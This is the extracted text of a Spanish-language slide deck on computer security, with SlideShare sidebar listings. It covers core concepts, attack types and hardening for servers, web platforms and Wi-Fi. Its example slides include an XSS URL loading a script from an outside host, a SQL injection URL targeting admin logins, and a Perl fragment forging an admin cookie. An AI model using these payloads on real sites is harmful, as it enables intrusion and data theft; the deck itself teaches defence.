SlideShare une entreprise Scribd logo
1  sur  31
Télécharger pour lire hors ligne
Seguridad Informática
- Fundamentos de la seguridad informática
- Seguridad en ambiente de servidores
-
- Seguridad en plataformas Web
- Cómo proteger las redes Wi-Fi
- Recomendaciones generales para Internet
Seguridad Informática
http://www.seguridad-informatica.cl
CONCEPTOS BÁSICOS DE LA SEGURIDAD INFORMÁTICA

CONFIDENCIALIDAD

INTEGRIDAD

DISPONIBILIDAD

AUTENTICIDAD
Seguridad Informática
http://www.seguridad-informatica.cl
CONCEPTOS BÁSICOS DE LA SEGURIDAD INFORMÁTICA
No existe la absoluta seguridad !!
Todo es rompible si se le aplica fuerza. Una caja de vidrio
se puede romper, pero también una caja fuerte de titanio.
¿Qué es más seguro: la caja de vidrio o la de titanio?
Evidentemente la de titanio, pero esto depende solamente
de que herramienta utilicemos para romperla.
Todo se puede vulnerar. La única razón por la cual
utilizamos rejas de fierros en nuestras casas y los bancos
es porque hace que el ataque sea más lento.
Seguridad Informática
http://www.seguridad-
informatica.cl
CONCEPTOS BÁSICOS DE LA SEGURIDAD INFORMÁTICA
Entonces, ¿Cómo nos protegemos de la forma más
eficiente posible?

Determinando que queremos proteger (ej: Hardware,
datos privados, datos públicos, sistemas, etc)

Estableciendo prioridades de los factores a proteger

Formando políticas de seguridad

Manteniendo la seguridad en el tiempo
Seguridad Informática
http://www.seguridad-informatica.cl
CONCEPTOS BÁSICOS DE LA SEGURIDAD INFORMÁTICA
Debemos enfocarnos en REDUCIR EL RIESGO, y no en
tratar de eliminar las amenazas, ya que es imposible.
Para eso debemos saber de QUE o QUIENES nos
protegemos y también COMO nos atacan.
Seguridad Informática
http://www.seguridad-informatica.cl
SEGURIDAD EN AMBIENTE DE SERVIDORES Y PLATAFORMAS WEB
Seguridad Informática
http://www.seguridad-informatica.cl
Ataques Internos
- Premeditación (Empleados mal intencionados o ex empleados con
información privilegiada)
- Descuido
- Ignorancia
- Indiferencia de las politicas de seguridad
Ataques externos
-
- Hackers, Crackers, Lammers, Script-Kiddies
-
- Motivaciones: Ranking, reto personal, robo de datos, pruebas (pen test),
etc.
SEGURIDAD EN AMBIENTE DE SERVIDORES Y PLATAFORMAS WEB
Seguridad Informática
http://www.seguridad-informatica.cl
Ataques Internos
•
Suplantación de identidad
•
Sniffing (Incluso administradores pueden hacer sniffing.
Sugerencia: CIFRAR)
•
Robo de información (Ej: para la competencia)
•
Virus, Troyanos, Gusanos
•
Espionaje: Trashing, Shoulder Surfing, Grabaciones, etc
Keylogging - Keycatching
Keycatcher:
SEGURIDAD EN AMBIENTE DE SERVIDORES Y PLATAFORMAS WEB
Seguridad Informática
http://www.seguridad-informatica.cl
Ataques Externos
•
Ataques contra servicios WEB
•
Cross Site Scripting (XSS)
•
SQL Injection
•
Exploits
•
Robo de Identidad
•
Denegación de Servicio (DoS) y Denegación de Servicio
Distribuido (DDoS)
•
SPAM
•
VIRUS
•
Phishing (Whishing, Hishing)
•
Troyanos
SEGURIDAD EN AMBIENTE DE SERVIDORES Y PLATAFORMAS WEB
Seguridad Informática
http://www.seguridad-informatica.cl
XSS
SEGURIDAD EN AMBIENTE DE SERVIDORES Y PLATAFORMAS WEB
Seguridad Informática
http://www.seguridad-informatica.cl
XSS:
http://docs.info.apple.com/article.html?
artnum=';a=document.createElement('script');a.src='http://h4k.in/i.j
s';document.body.appendChild(a);//';alert(1)//%22;alert(2)//
%22;alert(3)//--%3E
SQL Injection:
http://www.sitiovulnerable.com/index.php?id=10 UNION SELECT
TOP 1 login_name FROM admin_login--
SEGURIDAD EN AMBIENTE DE SERVIDORES Y PLATAFORMAS WEB
Seguridad Informática
http://www.seguridad-informatica.cl
#!/usr/bin/perl
use LWP::UserAgent;
use HTTP::Cookies;
$host=shift;
if ($host eq "") {
print "Usage: webeye-xp.pl <host name>n";
exit;
}
my $browser = LWP::UserAgent->new();
my $resp = $browser->get("http://$host/admin/wg_user-
info.ml","Cookie","USER_ID=0; path=/;");
$t = $resp->content;
#print $t;
";
Ejemplo de un exploit en PERL:
SEGURIDAD EN AMBIENTE DE SERVIDORES Y PLATAFORMAS WEB
Seguridad Informática
http://www.seguridad-informatica.cl
SEGURIDAD EN AMBIENTE DE SERVIDORES Y PLATAFORMAS WEB
CONVIRTIENDO NUESTROS SERVICIOS EN FORTALEZAS
Seguridad Informática
http://www.seguridad-informatica.cl
¿COMO NOS DEFENDEMOS?
Debemos crear una lista de ”mandamientos” que debemos
seguir al pie de la letra.
No olvidarse que el hecho de no cumplir con alguno de estos
mandamientos inevitablemente caeremos en un mayor riesgo
para los servicios que queremos proteger.
SEGURIDAD EN AMBIENTE DE SERVIDORES Y PLATAFORMAS WEB
Seguridad Informática
http://www.seguridad-informatica.cl
LOS MANDAMIENTOS MAS IMPORTANTES DE SEGURIDAD

Siempre respetar las políticas de seguridad

Siempre tener nuestros servicios actualizados a la última versión
conocida estable

Utilizar mecanismos de criptografía para almacenar y transmitir
datos sensibles

Cambiar las claves cada cierto tiempo

Auto-auditar nuestros propios servicios. Autoatacarnos para saber
si somos o no vulnerables

Estar siempre alerta. Nunca pensar ”a nosotros nadie nos ataca”.

No dejar respaldos con información sensible en directorios web

No usar las mismas claves para servicios distintos (ej, la clave de
root sea la misma que la de MySQL)
SEGURIDAD EN AMBIENTE DE SERVIDORES Y PLATAFORMAS WEB
Seguridad Informática
http://www.seguridad-informatica.cl
SERVICIOS DE INTERNET
- Cambiar los puertos por defecto
- Garantizar el acceso solo a cuentas específicas
- Aplicar técnicas de Hardening
- Para servicios privados y confidenciales utilizar túneles seguros (VPN cifradas)
en Internet y redes no seguras
- Eliminar todos los banners posibles y sobre todo las versiones
- Habilitar módulos de seguridad (Ej mod_security en Apache)
- Levantar Firewalls e IDS/IPS
- Crear cuentas de sistema restringidas (aunque no tengan privilegios)
SEGURIDAD EN AMBIENTE DE SERVIDORES Y PLATAFORMAS WEB
Seguridad Informática
http://www.seguridad-informatica.cl
- Nunca trabajar con ”root” si no es estrictamente necesario
- Proteger con doble contraseña si es posible
- Elegir contraseñas seguras, mezclando mayúsculas, minúsculas, números y caracteres
especiales. Las claves no deben ser palabras coherentes (ej: Admin25)
- Cerrar puertos y eliminar aplicaciones innecesarias
- Borrar robots.txt y estadísticas públicas
- Proteger las URL (ej: mod_rewrite)
SERVICIOS DE INTERNETSERVICIOS DE INTERNET
SEGURIDAD EN AMBIENTE DE SERVIDORES Y PLATAFORMAS WEB
Seguridad Informática
http://www.seguridad-informatica.cl
SERVICIOS DE INTERNET
- Tener cuidado con los archivos temporales en directorios WEB. Ejemplo:
index.php~ (terminados en caracter “squiggle” o “pigtail (literalmente: cola de chancho)”
- Realizar respaldos periódicamente y probar que funcionen
- Conocer las técnicas de ataque más conocidas
- Auditar los códigos con herramientas de seguridad
- Si ejecutan algún servidor de base de datos, permitir solamente comunicación con interfaz
loopback y no dejar sin contraseña las bases de datos.
- En lo posible no utilizar servicios como:
- WEBMIN
- phpMyAdmin
- Interfaces WEB en routers o dispositivos de red
SEGURIDAD EN AMBIENTE DE SERVIDORES Y PLATAFORMAS WEB
Seguridad Informática
http://www.seguridad-informatica.cl
UN POCO MAS DE SEGURIDAD CON APACHE Y PHP
Apache. En httpd.conf activar las siguientes directivas:
ServerTokens Prod
ServerSignature Off
ServerAdmin <direccion@decorreo.com>
habilitar mod_security y mod_rewrite
PHP .En php.ini
php_expose=off
“esconde php”
mode_safe=on
evita que se ejecuten funciones como system(), passthru(), exec(), etc.
evitar scripts con phpinfo();
SEGURIDAD EN AMBIENTE DE SERVIDORES Y PLATAFORMAS WEB
Seguridad Informática
http://www.seguridad-informatica.cl
Algunos ejemplos:
SEGURIDAD EN AMBIENTE DE SERVIDORES Y PLATAFORMAS WEB
Seguridad Informática
http://www.seguridad-informatica.cl
Algunos ejemplos:
SEGURIDAD EN AMBIENTE DE SERVIDORES Y PLATAFORMAS WEB
Dirección: http://www.sitioweb.com/config.php
ESTA PAGINA ES PRIVADA
Seguridad Informática
http://www.seguridad-informatica.cl
Algunos ejemplos:
SEGURIDAD EN AMBIENTE DE SERVIDORES Y PLATAFORMAS WEB
Dirección: http://www.sitioweb.com/config.php~
<?php
/*Variables base de datos*/
$sys['db_host'] = "localhost";
$sys['db_username'] = "root";
$sys['db_password'] = "123";
$sys['db_database'] = "base_de_datos";
echo "<center>ESTA PAGINA ES PRIVADA";
?>
Seguridad Informática
http://www.seguridad-informatica.cl
Algunos ejemplos:
SEGURIDAD EN AMBIENTE DE SERVIDORES Y PLATAFORMAS WEB
Solución al problema anterior: UN CRON QUE ELIMINE LOS ARCHIVOS
TEMPORALES
/etc/crontab
*/5 * * * * root rm /var/www/*.*~
Seguridad Informática
http://www.seguridad-informatica.cl
PROTECCIÓN DE REDES WI-FI
Seguridad Informática
http://www.seguridad-informatica.cl
PROTECCIÓN DE REDES WI-FI
EL GRAN PROBLEMA DE LAS REDES WI-FI ES GRAN EXTENSIÓN
FÍSICA (No hay cables) LO QUE CONLLEVA A QUE SEA MÁS FÁCIL
ACCEDER A ELLAS REMOTAMENTE
EXISTEN UNA SERIE DE MEDIDAS QUE SE PUEDEN TOMAR PARA
REDUCIR EL RIESGO DE ATAQUES.
Seguridad Informática
http://www.seguridad-informatica.cl
PROTECCIÓN DE REDES WI-FI

Apagar el router o access point cuando no se ocupe

Nunca entregar la clave Wi-Fi a terceros

Utilizar claves de tipo WPA2. Como segunda opción WPA y en el peor de los
casos WEP (128 y 64 bits)

Habilitar el control de acceso por MAC. Son fáciles de clonar pero pone una
barrera más

Deshabilitar servicios innecesarios en el router (SNMP, Telnet, SSH, etc)

Deshabilitar el acceso inalámbrico a la configuración

Cambiar los puertos por defecto de los servicios necesarios en el router (ej:
http a 1000)

Desactivar el broadcasting SSID

Desactivar DHCP. Utilizar sólo IP manuales dentro de rangos poco
convencionales. (Ej: 90.0.10.0 – 90.0.10.254)

Usar VPN si fuese posible.
Seguridad Informática
http://www.seguridad-informatica.cl
PROTECCIÓN DE REDES WI-FI

Cambiar regularmente las claves Wi-Fi (tanto administración como clave de
red).

Guardar bien las claves de administración

Usar contraseñas complicadas. (Ej: E_aR@_1-x

No usar dispositivos Wi-Fi cerca de hornos microondas ni teléfonos
inalámbricos

Realizar un scaneo local de las redes disponibles para evitar interferencias.
LOS CANALES QUE NO SE INTERFIEREN SON: 1, 6 y 11
Seguridad Informática
http://www.seguridad-informatica.cl
HERRAMIENTAS DE SEGURIDAD
Seguridad Informática
http://www.seguridad-informatica.cl
HERRAMIENTAS DE SEGURIDAD
COMERCIALES
GFI LANGUARD SECURITY SCANNERGFI LANGUARD SECURITY SCANNER
www.gfi.com
N-Stalker (ex N-Stealth)N-Stalker (ex N-Stealth)
www.nstalker.com
ACUNETIX WEB SCANNERACUNETIX WEB SCANNER
www.acunetix.com
Seguridad Informática
http://www.seguridad-informatica.cl
HERRAMIENTAS DE SEGURIDAD
GRATIS
NMAP (Network Mapper)NMAP (Network Mapper)
www.insecure.org/nmap NESSUSNESSUS
www.nessus.org
Seguridad Informática
http://www.seguridad-informatica.cl
¿¿PREGUNTAS??

Contenu connexe

Tendances

Webinar Gratuito: "Maquinas Vulnerables para Hacking Web"
Webinar Gratuito: "Maquinas Vulnerables para Hacking Web"Webinar Gratuito: "Maquinas Vulnerables para Hacking Web"
Webinar Gratuito: "Maquinas Vulnerables para Hacking Web"Alonso Caballero
 
Ayuda Web Seguridad Romero Gt
Ayuda Web Seguridad Romero GtAyuda Web Seguridad Romero Gt
Ayuda Web Seguridad Romero GtMauricio Romero
 
Seguridad informatica
Seguridad informaticaSeguridad informatica
Seguridad informaticaLorena Arroyo
 
Proteccion de transacciones en linea
Proteccion de transacciones en lineaProteccion de transacciones en linea
Proteccion de transacciones en lineaFernanda Loyola
 
Webinar Gratuito: Crear un Medio Infectado con Metasploit Framework
Webinar Gratuito: Crear un Medio Infectado con Metasploit FrameworkWebinar Gratuito: Crear un Medio Infectado con Metasploit Framework
Webinar Gratuito: Crear un Medio Infectado con Metasploit FrameworkAlonso Caballero
 
Links videos didacticos y herramienta de simulacion
Links videos didacticos y herramienta de simulacionLinks videos didacticos y herramienta de simulacion
Links videos didacticos y herramienta de simulacionUNAD
 
Tareas básicas de internet. Comercio digital
Tareas básicas de internet. Comercio digitalTareas básicas de internet. Comercio digital
Tareas básicas de internet. Comercio digitaljanerodriguezc
 
Desarrollo Seguro en Drupal - DrupalCamp Spain 2013
Desarrollo Seguro en Drupal - DrupalCamp Spain 2013Desarrollo Seguro en Drupal - DrupalCamp Spain 2013
Desarrollo Seguro en Drupal - DrupalCamp Spain 2013zekivazquez
 

Tendances (13)

Webinar Gratuito: "Maquinas Vulnerables para Hacking Web"
Webinar Gratuito: "Maquinas Vulnerables para Hacking Web"Webinar Gratuito: "Maquinas Vulnerables para Hacking Web"
Webinar Gratuito: "Maquinas Vulnerables para Hacking Web"
 
Peligros Internet Padres
Peligros Internet PadresPeligros Internet Padres
Peligros Internet Padres
 
Ayuda Web Seguridad Romero Gt
Ayuda Web Seguridad Romero GtAyuda Web Seguridad Romero Gt
Ayuda Web Seguridad Romero Gt
 
Seguridad informatica
Seguridad informaticaSeguridad informatica
Seguridad informatica
 
Proteccion de transacciones en linea
Proteccion de transacciones en lineaProteccion de transacciones en linea
Proteccion de transacciones en linea
 
Webinar Gratuito: Crear un Medio Infectado con Metasploit Framework
Webinar Gratuito: Crear un Medio Infectado con Metasploit FrameworkWebinar Gratuito: Crear un Medio Infectado con Metasploit Framework
Webinar Gratuito: Crear un Medio Infectado con Metasploit Framework
 
Grooming hacking
Grooming hackingGrooming hacking
Grooming hacking
 
Links videos didacticos y herramienta de simulacion
Links videos didacticos y herramienta de simulacionLinks videos didacticos y herramienta de simulacion
Links videos didacticos y herramienta de simulacion
 
Tareas básicas de internet. Comercio digital
Tareas básicas de internet. Comercio digitalTareas básicas de internet. Comercio digital
Tareas básicas de internet. Comercio digital
 
Desarrollo Seguro en Drupal - DrupalCamp Spain 2013
Desarrollo Seguro en Drupal - DrupalCamp Spain 2013Desarrollo Seguro en Drupal - DrupalCamp Spain 2013
Desarrollo Seguro en Drupal - DrupalCamp Spain 2013
 
Evitar robos
Evitar robosEvitar robos
Evitar robos
 
Tmg
TmgTmg
Tmg
 
6 consejos de seguridad para tu empresa
6 consejos de seguridad para tu empresa6 consejos de seguridad para tu empresa
6 consejos de seguridad para tu empresa
 

En vedette

En vedette (20)

Pacie mpi
Pacie mpiPacie mpi
Pacie mpi
 
Cursoefamiliar1
Cursoefamiliar1Cursoefamiliar1
Cursoefamiliar1
 
2.1 definicion de sistema
2.1 definicion de sistema2.1 definicion de sistema
2.1 definicion de sistema
 
Doc2
Doc2Doc2
Doc2
 
Motivacion
MotivacionMotivacion
Motivacion
 
Otras funciones
Otras funcionesOtras funciones
Otras funciones
 
Publico y privado en colombia y en original 111
Publico y privado en colombia y en original 111Publico y privado en colombia y en original 111
Publico y privado en colombia y en original 111
 
Create bootable copy of mountain lion
Create bootable copy of mountain lion Create bootable copy of mountain lion
Create bootable copy of mountain lion
 
Presup Empr Ind - Lect 4
Presup Empr Ind - Lect 4Presup Empr Ind - Lect 4
Presup Empr Ind - Lect 4
 
Perspectiva
PerspectivaPerspectiva
Perspectiva
 
Cruzadas sandra
Cruzadas sandraCruzadas sandra
Cruzadas sandra
 
Presentacion autores
Presentacion autoresPresentacion autores
Presentacion autores
 
Pacie-Interacción
Pacie-InteracciónPacie-Interacción
Pacie-Interacción
 
2
22
2
 
Presentación2
Presentación2Presentación2
Presentación2
 
Asignación #6 - GEMA1000
Asignación #6 - GEMA1000Asignación #6 - GEMA1000
Asignación #6 - GEMA1000
 
Anthony Nuñez y Karol Guerron Diagramas De Flujo
Anthony Nuñez y Karol Guerron Diagramas De Flujo Anthony Nuñez y Karol Guerron Diagramas De Flujo
Anthony Nuñez y Karol Guerron Diagramas De Flujo
 
Tableau plaidoirie 515(10)a) c.cr
Tableau plaidoirie   515(10)a) c.crTableau plaidoirie   515(10)a) c.cr
Tableau plaidoirie 515(10)a) c.cr
 
Infa-Micron Kassettenfilter MKR
Infa-Micron Kassettenfilter MKRInfa-Micron Kassettenfilter MKR
Infa-Micron Kassettenfilter MKR
 
Afiche taller geogebra tunuyan 11
Afiche taller geogebra tunuyan  11Afiche taller geogebra tunuyan  11
Afiche taller geogebra tunuyan 11
 

Similaire à S i 05

Seguridad informatica
Seguridad informaticaSeguridad informatica
Seguridad informaticaJohan Pérez
 
Seguridad informatica
Seguridad informaticaSeguridad informatica
Seguridad informaticadari123
 
Seguridad Informatica, via Meeting.cl
Seguridad Informatica, via Meeting.clSeguridad Informatica, via Meeting.cl
Seguridad Informatica, via Meeting.clCristian Sepulveda
 
Seguridad informatica
Seguridad informaticaSeguridad informatica
Seguridad informaticacaanamlo
 
Seguridad informatica
Seguridad informaticaSeguridad informatica
Seguridad informaticaangupo
 
Seguridad informatica
Seguridad informaticaSeguridad informatica
Seguridad informaticazulygomez1
 
Seguridad informatica
Seguridad informaticaSeguridad informatica
Seguridad informaticaangupo
 
Web App Security, Ethical hacking for CodeCamp SDQ 5
Web App Security, Ethical hacking for CodeCamp SDQ 5Web App Security, Ethical hacking for CodeCamp SDQ 5
Web App Security, Ethical hacking for CodeCamp SDQ 5Jose Gratereaux
 
Modulo 10: Conceptos de Seguridad de LAN
Modulo 10: Conceptos de Seguridad de LANModulo 10: Conceptos de Seguridad de LAN
Modulo 10: Conceptos de Seguridad de LANsrkamote
 
Seguridad de información para criptoactivos
Seguridad de información para criptoactivosSeguridad de información para criptoactivos
Seguridad de información para criptoactivosEudy Zerpa
 
Atacando servicios web
Atacando servicios webAtacando servicios web
Atacando servicios weblimahack
 
Los 7 pecados del Desarrollo Web
Los 7 pecados del Desarrollo WebLos 7 pecados del Desarrollo Web
Los 7 pecados del Desarrollo Webacksec
 
Seguridad informática y de ti
Seguridad informática y de tiSeguridad informática y de ti
Seguridad informática y de tiMario Nizama
 
Seguridad de los dispositivos de red
Seguridad de los dispositivos de redSeguridad de los dispositivos de red
Seguridad de los dispositivos de redCarlitos Alvarado
 
Seguridad en servidores WEB. Modulo mod_security
Seguridad en servidores WEB. Modulo mod_securitySeguridad en servidores WEB. Modulo mod_security
Seguridad en servidores WEB. Modulo mod_securityseguridadelinux
 

Similaire à S i 05 (20)

Seguridad informatica
Seguridad informaticaSeguridad informatica
Seguridad informatica
 
Seguridad informatica
Seguridad informaticaSeguridad informatica
Seguridad informatica
 
Seguridad Informatica, via Meeting.cl
Seguridad Informatica, via Meeting.clSeguridad Informatica, via Meeting.cl
Seguridad Informatica, via Meeting.cl
 
Seguridad informatica
Seguridad informaticaSeguridad informatica
Seguridad informatica
 
Seguridad informatica
Seguridad informaticaSeguridad informatica
Seguridad informatica
 
Seguridad informatica
Seguridad informaticaSeguridad informatica
Seguridad informatica
 
Seguridad informatica
Seguridad informaticaSeguridad informatica
Seguridad informatica
 
Seguridad informatica
Seguridad informaticaSeguridad informatica
Seguridad informatica
 
Seguridad informatica
Seguridad informaticaSeguridad informatica
Seguridad informatica
 
Web App Security, Ethical hacking for CodeCamp SDQ 5
Web App Security, Ethical hacking for CodeCamp SDQ 5Web App Security, Ethical hacking for CodeCamp SDQ 5
Web App Security, Ethical hacking for CodeCamp SDQ 5
 
Modulo 10: Conceptos de Seguridad de LAN
Modulo 10: Conceptos de Seguridad de LANModulo 10: Conceptos de Seguridad de LAN
Modulo 10: Conceptos de Seguridad de LAN
 
Seguridad de información para criptoactivos
Seguridad de información para criptoactivosSeguridad de información para criptoactivos
Seguridad de información para criptoactivos
 
Atacando servicios web
Atacando servicios webAtacando servicios web
Atacando servicios web
 
Completo conferencia seguridad_web_software_libre_2015
Completo conferencia seguridad_web_software_libre_2015Completo conferencia seguridad_web_software_libre_2015
Completo conferencia seguridad_web_software_libre_2015
 
Los 7 pecados del Desarrollo Web
Los 7 pecados del Desarrollo WebLos 7 pecados del Desarrollo Web
Los 7 pecados del Desarrollo Web
 
Consejos de seguridad
Consejos de seguridadConsejos de seguridad
Consejos de seguridad
 
Seguridad informática y de ti
Seguridad informática y de tiSeguridad informática y de ti
Seguridad informática y de ti
 
Seguridad de los dispositivos de red
Seguridad de los dispositivos de redSeguridad de los dispositivos de red
Seguridad de los dispositivos de red
 
Seguridad Global
Seguridad GlobalSeguridad Global
Seguridad Global
 
Seguridad en servidores WEB. Modulo mod_security
Seguridad en servidores WEB. Modulo mod_securitySeguridad en servidores WEB. Modulo mod_security
Seguridad en servidores WEB. Modulo mod_security
 

Dernier

1ro Programación Anual D.P.C.C ACTUALIZADO
1ro Programación Anual D.P.C.C ACTUALIZADO1ro Programación Anual D.P.C.C ACTUALIZADO
1ro Programación Anual D.P.C.C ACTUALIZADODJElvitt
 
EL BRILLO DEL ECLIPSE (CUENTO LITERARIO). Autor y diseñador JAVIER SOLIS NOYOLA
EL BRILLO DEL ECLIPSE (CUENTO LITERARIO). Autor y diseñador JAVIER SOLIS NOYOLAEL BRILLO DEL ECLIPSE (CUENTO LITERARIO). Autor y diseñador JAVIER SOLIS NOYOLA
EL BRILLO DEL ECLIPSE (CUENTO LITERARIO). Autor y diseñador JAVIER SOLIS NOYOLAJAVIER SOLIS NOYOLA
 
sociales ciencias segundo trimestre tercero
sociales ciencias segundo trimestre tercerosociales ciencias segundo trimestre tercero
sociales ciencias segundo trimestre terceroCEIP TIERRA DE PINARES
 
1° GRADO UNIDAD DE APRENDIZAJE 0 - 2024.pdf
1° GRADO UNIDAD DE APRENDIZAJE 0 - 2024.pdf1° GRADO UNIDAD DE APRENDIZAJE 0 - 2024.pdf
1° GRADO UNIDAD DE APRENDIZAJE 0 - 2024.pdfdiana593621
 
CARPETA PEDAGÓGICA 2024.docx para educacion
CARPETA PEDAGÓGICA 2024.docx para educacionCARPETA PEDAGÓGICA 2024.docx para educacion
CARPETA PEDAGÓGICA 2024.docx para educacionCarolVigo1
 
Los escritos administrativos, técnicos y comerciales
Los escritos administrativos, técnicos y comercialesLos escritos administrativos, técnicos y comerciales
Los escritos administrativos, técnicos y comercialeshanda210618
 
Taller Grupal De la electricidad y la electrónica
Taller Grupal De la electricidad y la electrónicaTaller Grupal De la electricidad y la electrónica
Taller Grupal De la electricidad y la electrónicajuanpablosuarez310
 
EL ECLIPSE DE LA PAZ (cuento literario). Autor y diseñador JAVIER SOLIS NOYOLA
EL ECLIPSE DE LA PAZ (cuento literario). Autor y diseñador JAVIER SOLIS NOYOLAEL ECLIPSE DE LA PAZ (cuento literario). Autor y diseñador JAVIER SOLIS NOYOLA
EL ECLIPSE DE LA PAZ (cuento literario). Autor y diseñador JAVIER SOLIS NOYOLAJAVIER SOLIS NOYOLA
 
La Congregación de Jesús y María, conocida también como los Eudistas, fue fun...
La Congregación de Jesús y María, conocida también como los Eudistas, fue fun...La Congregación de Jesús y María, conocida también como los Eudistas, fue fun...
La Congregación de Jesús y María, conocida también como los Eudistas, fue fun...Unidad de Espiritualidad Eudista
 
PPT RM N° 587 -2023 PRIMARIA.pdf DE LA EDUCACION BASICA REGULAR
PPT RM N° 587 -2023 PRIMARIA.pdf DE LA EDUCACION BASICA REGULARPPT RM N° 587 -2023 PRIMARIA.pdf DE LA EDUCACION BASICA REGULAR
PPT RM N° 587 -2023 PRIMARIA.pdf DE LA EDUCACION BASICA REGULARCesarSantosTello
 
Herbert James Drape. Erotismo y sensualidad.pptx
Herbert James Drape. Erotismo y sensualidad.pptxHerbert James Drape. Erotismo y sensualidad.pptx
Herbert James Drape. Erotismo y sensualidad.pptxArs Erótica
 
Revista digital primer ciclo 2024 colección ediba
Revista digital primer ciclo 2024 colección edibaRevista digital primer ciclo 2024 colección ediba
Revista digital primer ciclo 2024 colección edibaTatiTerlecky1
 
plan espacios inspiradores para nivel primaria
plan espacios inspiradores para nivel primariaplan espacios inspiradores para nivel primaria
plan espacios inspiradores para nivel primariaElizabeth252489
 
CIENCIAS SOCIALES SEGUNDO TRIMESTRE TERCERO
CIENCIAS SOCIALES SEGUNDO TRIMESTRE TERCEROCIENCIAS SOCIALES SEGUNDO TRIMESTRE TERCERO
CIENCIAS SOCIALES SEGUNDO TRIMESTRE TERCEROCEIP TIERRA DE PINARES
 
Presentación contribuciones socioeconómicas del SUPV 2023
Presentación contribuciones socioeconómicas del SUPV 2023Presentación contribuciones socioeconómicas del SUPV 2023
Presentación contribuciones socioeconómicas del SUPV 2023Ivie
 
Presentación: Actividad de Diálogos adolescentes.pptx
Presentación: Actividad de  Diálogos adolescentes.pptxPresentación: Actividad de  Diálogos adolescentes.pptx
Presentación: Actividad de Diálogos adolescentes.pptxNabel Paulino Guerra Huaranca
 
21 MARZO DIA INTERNACIONAL DOS BOSQUES.pdf
21 MARZO DIA INTERNACIONAL DOS BOSQUES.pdf21 MARZO DIA INTERNACIONAL DOS BOSQUES.pdf
21 MARZO DIA INTERNACIONAL DOS BOSQUES.pdfceeabarcia
 

Dernier (20)

1ro Programación Anual D.P.C.C ACTUALIZADO
1ro Programación Anual D.P.C.C ACTUALIZADO1ro Programación Anual D.P.C.C ACTUALIZADO
1ro Programación Anual D.P.C.C ACTUALIZADO
 
EL BRILLO DEL ECLIPSE (CUENTO LITERARIO). Autor y diseñador JAVIER SOLIS NOYOLA
EL BRILLO DEL ECLIPSE (CUENTO LITERARIO). Autor y diseñador JAVIER SOLIS NOYOLAEL BRILLO DEL ECLIPSE (CUENTO LITERARIO). Autor y diseñador JAVIER SOLIS NOYOLA
EL BRILLO DEL ECLIPSE (CUENTO LITERARIO). Autor y diseñador JAVIER SOLIS NOYOLA
 
sociales ciencias segundo trimestre tercero
sociales ciencias segundo trimestre tercerosociales ciencias segundo trimestre tercero
sociales ciencias segundo trimestre tercero
 
1° GRADO UNIDAD DE APRENDIZAJE 0 - 2024.pdf
1° GRADO UNIDAD DE APRENDIZAJE 0 - 2024.pdf1° GRADO UNIDAD DE APRENDIZAJE 0 - 2024.pdf
1° GRADO UNIDAD DE APRENDIZAJE 0 - 2024.pdf
 
Tema 5.- BASES DE DATOS Y GESTIÓN DE LA INF. PARA EL MARKETING.pdf
Tema 5.- BASES DE DATOS Y GESTIÓN DE LA INF. PARA EL MARKETING.pdfTema 5.- BASES DE DATOS Y GESTIÓN DE LA INF. PARA EL MARKETING.pdf
Tema 5.- BASES DE DATOS Y GESTIÓN DE LA INF. PARA EL MARKETING.pdf
 
CARPETA PEDAGÓGICA 2024.docx para educacion
CARPETA PEDAGÓGICA 2024.docx para educacionCARPETA PEDAGÓGICA 2024.docx para educacion
CARPETA PEDAGÓGICA 2024.docx para educacion
 
Los escritos administrativos, técnicos y comerciales
Los escritos administrativos, técnicos y comercialesLos escritos administrativos, técnicos y comerciales
Los escritos administrativos, técnicos y comerciales
 
Taller Grupal De la electricidad y la electrónica
Taller Grupal De la electricidad y la electrónicaTaller Grupal De la electricidad y la electrónica
Taller Grupal De la electricidad y la electrónica
 
EL ECLIPSE DE LA PAZ (cuento literario). Autor y diseñador JAVIER SOLIS NOYOLA
EL ECLIPSE DE LA PAZ (cuento literario). Autor y diseñador JAVIER SOLIS NOYOLAEL ECLIPSE DE LA PAZ (cuento literario). Autor y diseñador JAVIER SOLIS NOYOLA
EL ECLIPSE DE LA PAZ (cuento literario). Autor y diseñador JAVIER SOLIS NOYOLA
 
La Congregación de Jesús y María, conocida también como los Eudistas, fue fun...
La Congregación de Jesús y María, conocida también como los Eudistas, fue fun...La Congregación de Jesús y María, conocida también como los Eudistas, fue fun...
La Congregación de Jesús y María, conocida también como los Eudistas, fue fun...
 
PPT RM N° 587 -2023 PRIMARIA.pdf DE LA EDUCACION BASICA REGULAR
PPT RM N° 587 -2023 PRIMARIA.pdf DE LA EDUCACION BASICA REGULARPPT RM N° 587 -2023 PRIMARIA.pdf DE LA EDUCACION BASICA REGULAR
PPT RM N° 587 -2023 PRIMARIA.pdf DE LA EDUCACION BASICA REGULAR
 
Herbert James Drape. Erotismo y sensualidad.pptx
Herbert James Drape. Erotismo y sensualidad.pptxHerbert James Drape. Erotismo y sensualidad.pptx
Herbert James Drape. Erotismo y sensualidad.pptx
 
Revista digital primer ciclo 2024 colección ediba
Revista digital primer ciclo 2024 colección edibaRevista digital primer ciclo 2024 colección ediba
Revista digital primer ciclo 2024 colección ediba
 
plan espacios inspiradores para nivel primaria
plan espacios inspiradores para nivel primariaplan espacios inspiradores para nivel primaria
plan espacios inspiradores para nivel primaria
 
CIENCIAS SOCIALES SEGUNDO TRIMESTRE TERCERO
CIENCIAS SOCIALES SEGUNDO TRIMESTRE TERCEROCIENCIAS SOCIALES SEGUNDO TRIMESTRE TERCERO
CIENCIAS SOCIALES SEGUNDO TRIMESTRE TERCERO
 
MULTIPLICACION RAPIDA PARA TODAS LAS EDADES
MULTIPLICACION RAPIDA PARA TODAS LAS EDADESMULTIPLICACION RAPIDA PARA TODAS LAS EDADES
MULTIPLICACION RAPIDA PARA TODAS LAS EDADES
 
Presentación contribuciones socioeconómicas del SUPV 2023
Presentación contribuciones socioeconómicas del SUPV 2023Presentación contribuciones socioeconómicas del SUPV 2023
Presentación contribuciones socioeconómicas del SUPV 2023
 
Presentación: Actividad de Diálogos adolescentes.pptx
Presentación: Actividad de  Diálogos adolescentes.pptxPresentación: Actividad de  Diálogos adolescentes.pptx
Presentación: Actividad de Diálogos adolescentes.pptx
 
Conducta ética en investigación científica.pdf
Conducta ética en investigación científica.pdfConducta ética en investigación científica.pdf
Conducta ética en investigación científica.pdf
 
21 MARZO DIA INTERNACIONAL DOS BOSQUES.pdf
21 MARZO DIA INTERNACIONAL DOS BOSQUES.pdf21 MARZO DIA INTERNACIONAL DOS BOSQUES.pdf
21 MARZO DIA INTERNACIONAL DOS BOSQUES.pdf
 

S i 05